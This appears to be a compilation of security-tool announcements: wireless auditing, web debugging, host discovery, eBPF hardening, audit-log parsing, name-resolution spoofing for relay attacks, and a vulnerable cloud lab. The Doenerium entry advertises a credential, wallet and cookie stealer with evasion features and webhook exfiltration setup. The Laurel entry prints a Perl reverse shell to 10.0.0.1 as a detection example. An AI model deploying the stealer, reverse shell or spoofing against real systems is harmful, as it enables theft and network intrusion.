Use the command use 'moduleID' to activate a Pinecone module. You can use Tab auto-completion to see the list of current loaded modules:

pinecone > use 
attack/deauth daemon/hostapd-wpe report/db2json scripts/infrastructure/ap
daemon/dnsmasq discovery/recon scripts/attack/wpa_handshake
pinecone > use discovery/recon
pcn module(discovery/recon) >

Every module has options, that can be seen typing help run or run --help when a module is activated. Most modules have default values for their options (check them before running):

pcn module(discovery/recon) > help run
usage: run [-h] [-i INTERFACE]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --iface INTERFACE
monitor mode capable WLAN interface (default: wlan0)

When a module is activated, you can use the run [options...] command to start its functionality. The modules provide feedback of their execution state:

pcn script(attack/wpa_handshake) > run -s TEST_SSID
[i] Sending 64 deauth frames to all clients from AP 00:11:22:33:44:55 on channel 1...
................................................................
Sent 64 packets.
[i] Monitoring for 10 secs on channel 1 WPA handshakes between all clients and AP 00:11:22:33:44:55...

If the module runs in background (for example, scripts/infrastructure/ap), you can stop it using the stop command when the module is running:

When you are done using a module, you can deactivate it by using the back command. You can also activate another module issuing the use command again.

Shell commands may be executed with the command shell or the ! shortcut:

pinecone > !ls
LICENSE modules module_template.py pinecone pinecone.py README.md requirements.txt TODO.md

Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.




Cdb - Automate Common Chrome Debug Protocol Tasks To Help Debug Web Applications From The Command-Line And Actively Monitor And Intercept HTTP Requests And Responses

$
0
0


Pown CDB is a Chrome Debug Protocol utility. The main goal of the tool is to automate common tasks to help debug web applications from the command-line and actively monitor and intercept HTTP requests and responses. This is particularly useful during penetration tests and other types of security assessments and investigations.


Credits

This tool is part of secapps.com open-source initiative.

  ___ ___ ___   _   ___ ___  ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com

Authors

Quickstart

This tool is meant to be used as part of Pown.js but it can be invoked separately as an independent tool.

Install Pown first as usual:

$ npm install -g pown@latest

Invoke directly from Pown:

$ pown cdb

Library Use

Install this module locally from the root of your project:

$ npm install @pown/cdb --save

Once done, invoke pown cli:

$ POWN_ROOT=. ./node_modules/.bin/pown-cli cdb

You can also use the global pown to invoke the tool locally:

$ POWN_ROOT=. pown cdb

Usage

WARNING: This pown command is currently under development and as a result will be subject to breaking changes.

pown cdb <command>

Chrome Debug Protocol Tool

Commands:
pown cdb launch Launch server application such as chrome, firefox, opera and edge [aliases: start]
pown cdb navigate <url> Go to the specified url [aliases: goto, go]
pown cdb network Chrome Debug Protocol Network Monitor [aliases: net, sniff, proxy, mon, monitor]
pown cdb cookies Dump current page cookies [aliases: cookie]
pown cdb screenshot <file> Screenshot the current page [aliases: capture, shoot, shot]

Options:
--version Show version number [boolean]
--help Show help [boolean]

pown cdb launch

pown cdb launch

Launch server application such as chrome, firefox, opera and edge

Options:
--version Show version number [boolean]
--help Show help [boolean]
--port, -p Remote debugging port [number] [default: 9222]
--xss-auditor, -x Turn on/off XSS auditor [boolean] [default: true]
--certificate-errors, -c Turn on/off certificate errors [boolean] [default: true]
--pentest, -t Start with prefered settings for pentesting [boolean] [default: false]

pown cdb navigate

pown cdb network
pown cdb cookies
pown cdb screenshot
Tutorials

Web Application Security Assessment

Let's explore how to use Pown CDB during a typical web app security engagments.

First, ensure that you have the latest pown installed:

$ npm install -g pown

If you have pown installed, make sure you have the latest version:

$ pown update

To get started with Pown CDB we need a Chrome browser instance (other browsers are also supported) with chrome debug remote interface enabled and listening on localhost:

$ pown cdb launch --port 9333

Once the chrome browser instance is running, hook it with pown cdb network utility:

$ pown cdb network --port 9333 -b

The -b flag is used to start Pown CDB with a curses-based user interface:


Use key-combo shift + ? to get a list of available shortcuts:


As soon as you start using the browser, Pown CDB will record and display the traffic in the user interface. To intercept requests use key-combo ctrl + t.


Requests are captured and opened in your default shell editor ($EDITOR). Make the desired changes, save and quit. The original request will be replaced with your changes.



RESim - Reverse Engineering Software Using A Full System Simulator

$
0
0


Reverse engineering using a full system simulator.

  • Dynamic analysis by instrumenting simulated hardware using Simics
  • Trace process trees, system calls and individual programs
  • Reverse execution to selected breakpoints and events
  • Integrated with IDA Pro(tm) debugging client
  • Fuzz with a customized AFL, injecting directly into simulated memory
RESim is a dynamic system analysis tool that provides detailed insight into processes, programs and data flow within networked computers. RESim simulates networks of computers through use of the Simics'[1] platform’s high fidelity models of processors, peripheral devices (e.g., network interface cards), and disks. The networked simulated computers load and run targeted software copied from images extracted from the physical systems being modeled.

Broadly, RESim aids reverse engineering and vulnerability analysis of networks of Linux-based systems by inventorying processes in terms of the programs they execute and the data they consume. Data sources include files, device interfaces and inter-process communication mechanisms. Process execution and data consumption is documented through dynamic analysis of a running simulated system without installation or injection of software into the simulated system, and without detailed knowledge of the kernel hosting the processes.

RESim also provides interactive visibility into individual executing programs through use of a custom plug-in to the IDA Pro disassembler/debugger. The disassembler/debugger allows setting breakpoints to pause the simulation at selected events in either future time, or past time. For example, RESim can direct the simulation state to reverse until the most recent modification of a selected memory address.
Reloadable checkpoints may be generated at any point during system execution.
A RESim simulation can be paused for inspection, e.g., when a specified process is scheduled for execution, and subsequently continued, potentially with altered memory or register state. The analyst can explicitly modify memory or register content, and can also dynamically augment memory based on system events, e.g., change a password file entry when read by the su program.

Analysis is performed entirely through observation of the simulated target system’s memory and processor state, without need for shells, software injection, or kernel symbol tables. The analysis is said to be external because the analysis observation functions have no effect on the state of the simulated system.

RESim has been integrated with the American Fuzzing Lop (AFL) fuzzer. This fuzzing system injects fuzzed data directly into the application read buffer, simplifying the fuzzing setup and workflow. RESim automatically replays and analyzes any detected crashes, identifying the causes of crashes, e.g., corruption of execution control.

Please refer to the RESim User's Guide for additional information. A brief demonstration of RESim can be seen here: (https://nps.box.com/s/rf3n104ualg38pon6b7fm6m6wqk9zz50)

RESim is based on a software vetting and forensic analysis platform created for the DARPA Cyber Grand Challenge. That repo is here: https://github.com/mfthomps/cgc-monitor. A paper describing that work is at https://www.sciencedirect.com/science/article/pii/S1742287618301920 And a fine summary of the use of Simics in the CGC Monitor is at https://software.intel.com/content/www/us/en/develop/blogs/simics-software-automates-cyber-grand-challenge-validation.html

[1]Simics is a full system simulator sold by Wind River, which holds all relevant trademarks.



LiveTargetsFinder - Generates Lists Of Live Hosts And URLs For Targeting, Automating The Usage Of MassDNS, Masscan And Nmap To Filter Out Unreachable Hosts And Gather Service Information

$
0
0


Generates lists of live hosts and URLs for targeting, automating the usage of Massdns, Masscan and nmap to filter out unreachable hosts

Given an input file of domain names, this script will automate the usage of MassDNS to filter out unresolvable hosts, and then pass the results on to Masscan to confirm that the hosts are reachable and on which ports. The script will then generate a list of full URLs to be used for further targeting (passing into tools like gobuster or dirsearch, or making HTTP requests), a list of reachable domain names, and a list of reachable IP addresses. As an optional last step, you can run an nmap version scan on this reduced host list, verifying that the earlier reachable hosts are up, and gathering service information from their open ports.


Overview

This script is especially useful for large domain sets, such as subdomain enumerations gathered from an apex domain with thousands of subdomains. With these large lists, an nmap scan would simply take too long. The goal here is to first use the less accurate, but much faster, MassDNS to quickly reduce the size of your input list by removing unresolvable domains. Then, Masscan will be able to take the output from MassDNS, and further confirm that the hosts are reachable, and on which ports. The script will then parse these results and generate lists of the live hosts discovered.

Now, the list of hosts should be reduced enough to be suitable for further scanning/testing. If you want to go a step further, you can tell the script to run an nmap scan on the list of reachable hosts, which should take more reasonable amount of time with the shorter list of hosts. After running nmap, any false positives given from Masscan will be filtered out. Raw nmap output will be stored in the regular nmap XML format, and additional information from the version detection will be added to a SQLite database.

Installation

If using the nmap scan option, this tool assumes that you already have nmap installed

Note: Running the install script is only needed if you do not already have MassDNS and Masscan installed, or if you would like to reinstall them inside this repo. If you do not run the script, you can provide the paths to the respective executables as arguments. The script additionally expects that the resolvers list included with MassDNS be located at {massDNS_directory}/lists/resolvers.txt.

git clone https://github.com/allyomalley/LiveTargetsFinder.git
cd LiveTargetsFinder
sudo pip3 install -r requirements.txt

(OPTIONAL)

chmod +x install_deps.sh
./install_deps.sh

If you do not already have MassDNS and Masscan installed, and would prefer to install them yourself, see the documentation for instructions:

MassDNS

Masscan

I have only tested this script on macOS and Linux - the python script itself should work on a Windows machine, though I believe the installation for MassDNS and Masscan will differ.

Usage

python3 liveTargetsFinder.py [domainList] [options]
FlagDescriptionDefaultRequired
                --target-list               Input file containing list of domains, e.g google.comYes
  --massdns-path Path to the MassDNS executable, if non-default./massdns/bin/massdnsNo
  --masscan-path Path to the Masscan executable, if non-default./masscan/bin/masscanNo
  --nmap Run an nmap version detection scan on the gathered live hostsDisabledNo
  --db-path If using the --nmap option, supply the path to the database you would like to append to (will be created if does not exist)output/liveTargetsFinder.sqlite3No
  • Note that the Masscan and MassDNS settings are hardcoded inside liveTargetsFinder.py. Feel free to edit them (lines 87 + 97).
  • Since this tool was designed with very large lists in mind, I tweaked many of the settings to try to balance speed, accuracy, and network constraints - these can all be adjusted to suit your needs and bandwith.
  • Default settings for Masscan only scans ports 80 and 443.
    • -s, (--hashmap-size) in particular was chosen for performance reasons - you will likely be able to increase this.
    • Full MassDNS arguments:
      • -c 25 -o J -r ./massdns/lists/resolvers.txt -s 100 -w massdnsOutput -t A targetHosts
      • Documentation
  • Another setting of note is the --max-rate argument for Masscan - you will likely want to adjust this.
    • Full Masscan arguments:
      • -iL ipFile -oD masscanOutput --open-only --max-rate 5000 -p80,443 --max-retries 10
      • Documentation
  • Default nmap settings only scans ports 80 and 443, with timing -T4 and a few NSE scripts.
    • Full nmap arguments:
      • --script http-server-header.nse,http-devframework.nse,http-headers -sV -T4 -p80,443 -oX {output.xml}

Example

Did run install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt

Did NOT run the install script:

python3 liveTargetsFinder.py --target-list victim_domains.txt --massdns-path ../massdns/bin/massdns --masscan-path ../masscan/bin/masscan 

Perform an nmap scan and write to/append to the default DB path (liveTargetsFinder.sqlite3)

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap

Perform an nmap scan and write to/append to the specified database

python3 liveTargetsFinder.py --target-list victim_domains.txt --nmap --db-path serviceinfo_victim.sqlite3

Output

Input: victimDomains.txt

FileDescriptionExamples
output/victimDomains_targetUrls.txtList of reachable, live URLshttps://github.com, http://github.com
output/victimDomains_domains_alive.txtList of live domain namesgithub.com, google.com
output/victimDomains_ips_alive.txtList of live IP addresses10.1.0.200, 52.3.1.166
Supplied or default DB PathSQLite database storing live hosts and information about their services running
output/victimDomains_massdns.txtThe raw output from MassDNS, in ndjson format
output/victimDomains_masscan.txtThe raw output from Masscan, in ndjson format
output/victimDomains_nmap.txtThe raw output from nmap, in XML format


modDetective - Tool That Chronologizes Files Based On Modification Time In Order To Investigate Recent System Activity

$
0
0


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. This can be used in CTF's in order to pinpoint where escalation and attack vectors may exist.


modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. (1)

To see the tool in its most useful form, try running the command as follows: python3 modDetective.py -i /usr/share,/usr/lib,/lib. This will ignore the /usr/lib, /usr/share, and /lib directories, which tend not to have anything of interest. Also note that by default the "dynamic" directories are ignored (/proc, /sys, /run, /snap, /dev).

What is modDetective Doing?

modDetective is very elementary in how it operates. It simply walks the filesystem, with bounds determined by user specified options (-i is for ignore, meaning the tool will walk every directory EXCEPT for the ones specified in the -i option, and -e is for exclusive, meaning the tool will ONLY walk the directories specified). While walking, it picks up the modification times of each file, then orders these modification times in order to output them chronologically.

Additionally, in the output you will potentially see some files highlighted red. These files are denoted as "Indicators of User Activity," Since recent modifications to these files indicate that a user is currently active. As of now, these files include .swp files, .bash_history, .python_history and .viminfo. This list will be extended as I brainstorm more files that indicate present user activity.

Requirements

modDetective currently works only with python3; python2 compatability will be completed shortly (hence the lack of f strings). Standard libraries should be fine.



Doenerium - Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

$
0
0

Fully Undetected Grabber (Grabs Wallets, Passwords, Cookies, Modifies Discord Client Etc.)

Features

Stealer

  • Discord Token
  • Discord Info - Username, Phone number, Email, Billing, Nitro Status & Backup Codes
  • Discord Friends with rare badges
  • Grabs crypto wallets
    • Zcash
    • Armory
    • Bytecoin
    • Jaxx
    • Exodus
    • Ethereum
    • Electrum
    • AtomicWallet
    • Guarda
    • Coinomi
  • Browser (Chrome, Opera, Firefox, OperaGX, Edge, Brave, Yandex) - Passwords, Cookies, Autofill & History (Searches for specific keywords such as PayPal, Coinbase etc. in them)
  • Screenshot(s)
  • Injects itself to discord to grab token when changed

 

Additional

  • Crypto Clipper - BTC, LTC, XMR, ETH, XRP, NEO, BCH, DOGE, DASH, XLM
  • Ultra Obfuscation (use https://obfuscator.io)
  • Anti-Debug
  • Anti-VM
  • Validates a found discord token and then sends it to your discord webhook
  • Sends all files to your discord webhook in beautiful embeds and a structured zip filE

 

Screenshots









  Setting Up

Install Node.js

Install Visual studio with C++ compilers and all enabled (is a bit gigs but u wont have errors)

Run install.bat file to install all necessary files

Replace WEBHOOK with your webhook in config.js

Run build.bat and wait for doenerium-win.exe to be built.

Todo

  • Exodus wallet injection (get the password whenever the user logs in the wallet)
  • More grabbers (VPN's, Gaming, Messengers)
  • Keylogger
  • Growtopia stealer
  • Discord bot to build within discord ($build <webhook_url>)
  • Dynamic encryption

License

By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see commonsclause

Note

There is no official telegram server of this project. I don't own t.me/doenerium

I am not responsible for any damages this software may cause. This was made for personal education.

Credits

Credits to Pandoric / PandoricGalaxy for creating this beautiful README file



Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines

$
0
0


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in experimental stage, it may break, options and security semantics may change, some BPF programs will be updated to use Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strength Linux security. By restricting access to a various range of Linux features, bpflock is able to reduce the attack surface and block some well known attack techniques.

Only programs like container managers, systemd and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features, containers and applications that run on their own namespace will be restricted. If bpflock bpf programs run under the restricted profile then all programs/containers including privileged ones will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intent to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offer multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It support three global profiles to broadly cover the security sepctrum, and restrict access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the followings:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    If your kernel was compiled with CONFIG_BPF_LSM=y check the /boot/config-* to confirm, but when running bpflock it fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under restricted profile, the container logs will display:

    Running under the restricted profile may break things, this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all:
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and bpf.d profiles configs are in current directory inside bpflock directory, then we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    Bpf programs are built using libbpf. The docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses lot of resources including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



Laurel - Transform Linux Audit Logs For SIEM Usage

$
0
0


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.




Pretender - Your MitM Sidekick For Relaying Attacks Featuring DHCPv6 DNS Takeover As Well As mDNS, LLMNR And NetBIOS-NS Spoofing

$
0
0

Your MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover
as well as mDNS, LLMNR and NetBIOS-NS spoofing


pretender is a tool developed by RedTeam Pentesting to obtain machine-in-the-middle positions via spoofed local name resolution and DHCPv6 DNS takeover attacks. pretender primarily targets Windows hosts, as it is intended to be used for relaying attacks but can be deployed on Linux, Windows and all other platforms Go supports. Name resolution queries can be answered with arbitrary IPs for situations where the relaying tool runs on a different host than pretender. It is designed to work with tools such as Impacket'sntlmrelayx.py and krbrelayx that handle the incoming connections for relaying attacks or hash dumping.

Read our blog post for more information about DHCPv6 DNS takeover, local name resolution spoofing and relay attacks.


Usage

To get a feel for the situation in the local network, pretender can be started in --dry mode where it only logs incoming queries and does not answer any of them:

pretender -i eth0 --dry
pretender -i eth0 --dry --no-ra # without router advertisements

To perform local name resolution spoofing via mDNS, LLMNR and NetBIOS-NS as well as a DHCPv6 DNS takeover with router advertisements, simply run pretender like this:

pretender -i eth0

You can disable certain attacks with --no-dhcp-dns (disabled DHCPv6, DNS and router advertisements), --no-lnr (disabled mDNS, LLMNR and NetBIOS-NS), --no-mdns, --no-llmnr, --no-netbios and --no-ra.

If ntlmrelayx.py runs on a different host (say 10.0.0.10/fe80::5), run pretender like this:

pretender -i eth0 -4 10.0.0.10 -6 fe80::5

Pretender can be setup to only respond to queries for certain domains (or all but certain domains) and it can perform the spoofing attacks only for certain hosts (or all but certain hosts). Referencing hosts by hostname relies on the name resolution of the host that runs pretender. See the following example:

pretender -i eth0 --spoof example.com --dont-spoof-for 10.0.0.3,host1.corp,fe80::f --ignore-nofqdn

For more information, run pretender --help.


Tips

  • Make sure to enable IPv6 support in ntlmrelayx.py with the -6 flag
  • Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (--stop-after and main.vendorStopAfter)
  • Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with --no-host-info or main.vendorNoHostInfo
  • If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using --interfaces
  • If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use --no-ipv6-lnr/main.vendorNoIPv6LNR
  • DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (--spoof-for/--dont-spoof-for). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting --ignore-nofqdn
  • Depending on the build configuration, either the operating system resolver (CGO_ENABLED=1) or a Go implementation (CGO_ENABLED=0) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
  • The host info functionality is currently only available for Windows and Linux.
  • A custom MAC address vendor list can be compiled into the binary by replacing the default list hostinfo/mac-vendors.txt. Only lines with MAC prefixes in the following format are recognized: FF:FF:FF<tab>VendorID<tab>Vendor (the MAC prefix length can be arbitrary).
  • If you only want to perform Kerberos relaying you can specify --no-lnr and --spoof-types SOA to ignore any queries that are unrelated to the attack.
  • When conducting a Kerberos relay attack where krbrelayx.py runs on a different host than pretender (relay IPv4 address points to different host that runs krbrelayx.py), the host running krbrelayx.py will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.

Building and Vendoring

Pretender can be build as follows:

go build

Pretender can also be compiled with pre-configured settings. For this, the ldflags have to be modified like this:

-ldflags '-X main.vendorInterface=eth1'

For example, Pretender can be built for Windows with a specific default interface, without colored output and with a relay IPv4 address configured:

GOOS=windows go build -trimpath -ldflags '-X "main.vendorInterface=Ethernet 2" -X main.vendorNoColor=true -X main.vendorRelayIPv4=10.0.0.10'

Full list of vendoring options (see defaults.go or pretender --help for detailed information):

vendorInterface
vendorRelayIPv4
vendorRelayIPv6
vendorSOAHostname
vendorNoDHCPv6DNSTakeover
vendorNoDHCPv6
vendorNoDNS
vendorNoMDNS
vendorNoNetBIOS
vendorNoLLMNR
vendorNoLocalNameResolution
vendorNoRA
vendorNoIPv6LNR
vendorSpoof
vendorDontSpoof
vendorSpoofFor
vendorDontSpoofFor
vendorSpoofTypes
vendorIgnoreDHCPv6NoFQDN
vendorDryMode
vendorTTL
vendorLeaseLifetime
vendorRARouterLifetime
vendorRAPeriod
vendorStopAfter
vendorVerbose
vendorNoColor
vendorNoTimestamps
vendorLogFileName
vendorNoHostInfo
vendorHideIgnored
vendorRedirectStderr
vendorListInterfaces


TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool

$
0
0


TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

IDCloud Service CompanyTypes Of Cloud ServicesVulnerable Environment
1Alibaba CloudNetworkingVPC Security Group Open All Ports
2Alibaba CloudNetworkingVPC Security Group Open Common Ports
3Alibaba CloudObject StorageBucket HTTP Enable
4Alibaba CloudObject StorageObject ACL Writable
5Alibaba CloudObject StorageObject ACL Readable
6Alibaba CloudObject StorageSpecial Bucket Policy
7Alibaba CloudObject StorageBucket Public Access
8Alibaba CloudObject StorageObject Public Access
9Alibaba CloudObject StorageBucket Logging Disable
10Alibaba CloudObject StorageBucket Policy Readable
11Alibaba CloudObject StorageBucket Object Traversal
12Alibaba CloudObject StorageUnrestricted File Upload
13Alibaba CloudObject StorageServer Side Encryption No KMS Set
14Alibaba CloudObject StorageServer Side Encryption Not Using BYOK
15Alibaba CloudElastic Computing ServiceECS SSRF
16Alibaba CloudElastic Computing ServiceECS Unattached Disks Are Unencrypted
